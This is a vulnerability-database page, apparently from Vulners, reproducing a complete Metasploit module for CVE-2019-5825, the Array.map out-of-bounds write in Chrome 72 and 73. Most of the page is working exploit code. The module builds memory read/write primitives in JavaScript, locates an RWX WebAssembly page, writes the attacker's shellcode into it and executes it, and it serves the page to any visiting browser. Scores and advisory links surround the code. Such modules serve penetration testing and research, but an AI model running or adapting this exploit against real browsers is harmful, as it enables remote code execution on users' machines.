Vulners
Lucene search
Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)
| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
 | Google Chrome 72 / 73 Array.map Corruption Exploit | 6 Mar 202000:00 | – | zdt |
 | CVE-2019-5825 | 25 Nov 201900:00 | – | attackerkb |
 | Exploit for Out-of-bounds Write in Google Chrome | 23 Nov 201911:35 | – | githubexploit |
 | CVE-2019-5825 | 25 Sep 201908:28 | – | circl |
 | Google Chromium V8 Out-of-Bounds Write Vulnerability | 8 Jun 202200:00 | – | cisa_kev |
 | Google Chrome V8 Out-of-Bounds Write Vulnerability | 6 May 201900:00 | – | cnvd |
 | Google Chrome Out-of-Bounds Write (CVE-2019-5825) | 20 Jun 202200:00 | – | checkpoint_advisories |
 | CVE-2019-5825 | 25 Nov 201919:41 | – | cve |
 | CVE-2019-5825 | 25 Nov 201919:41 | – | cvelist |
 | [SECURITY] [DSA 4500-1] chromium security update | 13 Aug 201905:17 | – | debian |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Google Chrome 72 and 73 Array.map exploit',
'Description' => %q{
This module exploits an issue in Chrome 73.0.3683.86 (64 bit).
The exploit corrupts the length of a float in order to modify the backing store
of a typed array. The typed array can then be used to read and write arbitrary
memory. The exploit then uses WebAssembly in order to allocate a region of RWX
memory, which is then replaced with the payload.
The payload is executed within the sandboxed renderer process, so the browser
must be run with the --no-sandbox option for the payload to work correctly.
},
'License' => MSF_LICENSE,
'Author' => [
'dmxcsnsbh', # discovery
'István Kurucsai', # exploit
'timwr', # metasploit module
],
'References' => [
['CVE', '2019-5825'],
['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=941743'],
['URL', 'https://github.com/exodusintel/Chromium-941743'],
['URL', 'https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/'],
['URL', 'https://lordofpwn.kr/cve-2019-5825-v8-exploit/'],
],
'Arch' => [ ARCH_X64 ],
'Platform' => ['windows','osx'],
'DefaultTarget' => 0,
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Mar 7 2019'))
register_advanced_options([
OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
])
end
def on_request_uri(cli, request)
if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
print_status("[*] #{request.body}")
send_response(cli, '')
return
end
print_status("Sending #{request.uri} to #{request['User-Agent']}")
escaped_payload = Rex::Text.to_unescape(payload.encoded)
jscript = %Q^
// HELPER FUNCTIONS
let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);
BigInt.prototype.hex = function() {
return '0x' + this.toString(16);
};
BigInt.prototype.i2f = function() {
int_view[0] = this;
return float_view[0];
}
BigInt.prototype.smi2f = function() {
int_view[0] = this << 32n;
return float_view[0];
}
Number.prototype.f2i = function() {
float_view[0] = this;
return int_view[0];
}
Number.prototype.f2smi = function() {
float_view[0] = this;
return int_view[0] >> 32n;
}
Number.prototype.i2f = function() {
return BigInt(this).i2f();
}
Number.prototype.smi2f = function() {
return BigInt(this).smi2f();
}
// *******************
// Exploit starts here
// *******************
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);
// we are aiming for the following object layout
// [output of Array.map][packed float array][typed array][Object]
// First the length of the packed float array is corrupted via the original vulnerability,
// then the float array can be used to modify the backing store of the typed array, thus achieving AARW.
// The Object at the end is used to implement addrof
// offset of the length field of the float array from the map output
const float_array_len_offset = 23;
// offset of the length field of the typed array
const tarray_elements_len_offset = 24;
// offset of the address pointer of the typed array
const tarray_elements_addr_offset = tarray_elements_len_offset + 1;
const obj_prop_b_offset = 33;
// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
let cnt = 0;
var tarray;
var float_array;
var obj;
function mapping(a) {
function cb(elem, idx) {
if (idx == 0) {
float_array = [0.1, 0.2];
tarray = new BigUint64Array(2);
tarray[0] = 0x41414141n;
tarray[1] = 0x42424242n;
obj = {'a': 0x31323334, 'b': 1};
obj['b'] = obj;
}
if (idx > float_array_len_offset) {
// minimize the corruption for stability
throw "stop";
}
return idx;
}
return a.map(cb);
}
function get_rw() {
for (let i = 0; i < 10 ** 5; i++) {
mapping(a);
}
// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
mapping(a);
} catch(e) {
// relative RW from the float array from this point on
let sane = sanity_check()
print('sanity_check == ', sane);
print('len+3: ' + float_array[tarray_elements_len_offset+3].f2i().toString(16));
print('len+4: ' + float_array[tarray_elements_len_offset+4].f2i().toString(16));
print('len+8: ' + float_array[tarray_elements_len_offset+8].f2i().toString(16));
let original_elements_ptr = float_array[tarray_elements_len_offset+1].f2i() - 1n;
print('original elements addr: ' + original_elements_ptr.toString(16));
print('original elements value: ' + read8(original_elements_ptr).toString(16));
print('addrof(Object): ' + addrof(Object).toString(16));
}
}
function sanity_check() {
success = true;
success &= float_array[tarray_elements_len_offset+3].f2i() == 0x41414141;
success &= float_array[tarray_elements_len_offset+4].f2i() == 0x42424242;
success &= float_array[tarray_elements_len_offset+8].f2i() == 0x3132333400000000;
return success;
}
function read8(addr) {
let original = float_array[tarray_elements_len_offset+1];
float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
let result = tarray[0];
float_array[tarray_elements_len_offset+1] = original;
return result;
}
function write8(addr, val) {
let original = float_array[tarray_elements_len_offset+1];
float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
tarray[0] = val;
float_array[tarray_elements_len_offset+1] = original;
}
function addrof(o) {
obj['b'] = o;
return float_array[obj_prop_b_offset].f2i();
}
var wfunc = null;
var shellcode = unescape("#{escaped_payload}");
function get_wasm_func() {
var importObject = {
imports: { imported_func: arg => print(arg) }
};
bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
wasm_code = new Uint8Array(bc);
wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
return wasm_mod.exports.exported_func;
}
function rce() {
let wasm_func = get_wasm_func();
wfunc = wasm_func;
// traverse the JSFunction object chain to find the RWX WebAssembly code page
let wasm_func_addr = addrof(wasm_func) - 1n;
print('wasm: ' + wasm_func_addr);
if (wasm_func_addr == 2) {
print('Failed, retrying...');
location.reload();
return;
}
let sfi = read8(wasm_func_addr + 12n*2n) - 1n;
print('sfi: ' + sfi.toString(16));
let WasmExportedFunctionData = read8(sfi + 4n*2n) - 1n;
print('WasmExportedFunctionData: ' + WasmExportedFunctionData.toString(16));
let instance = read8(WasmExportedFunctionData + 8n*2n) - 1n;
print('instance: ' + instance.toString(16));
//let rwx_addr = read8(instance + 0x108n);
let rwx_addr = read8(instance + 0xf8n) + 0n; // Chrome/73.0.3683.86
//let rwx_addr = read8(instance + 0xe0n) + 18n; // Chrome/69.0.3497.100
//let rwx_addr = read8(read8(instance - 0xc8n) + 0x53n); // Chrome/68.0.3440.84
print('rwx: ' + rwx_addr.toString(16));
// write the shellcode to the RWX page
if (shellcode.length % 2 != 0) {
shellcode += "\u9090";
}
for (let i = 0; i < shellcode.length; i += 2) {
write8(rwx_addr + BigInt(i*2), BigInt(shellcode.charCodeAt(i) + shellcode.charCodeAt(i + 1) * 0x10000));
}
// invoke the shellcode
wfunc();
}
function exploit() {
print("Exploiting...");
get_rw();
rce();
}
exploit();
^
if datastore['DEBUG_EXPLOIT']
debugjs = %Q^
print = function(arg) {
var request = new XMLHttpRequest();
request.open("POST", "/print", false);
request.send("" + arg);
};
^
jscript = "#{debugjs}#{jscript}"
else
jscript.gsub!(/\/\/.*$/, '') # strip comments
jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
end
html = %Q^
<html>
<head>
<script>
#{jscript}
</script>
</head>
<body>
</body>
</html>
^
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2020 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 24.3
CVSS 3.16.5
EPSS0.73662
SSVC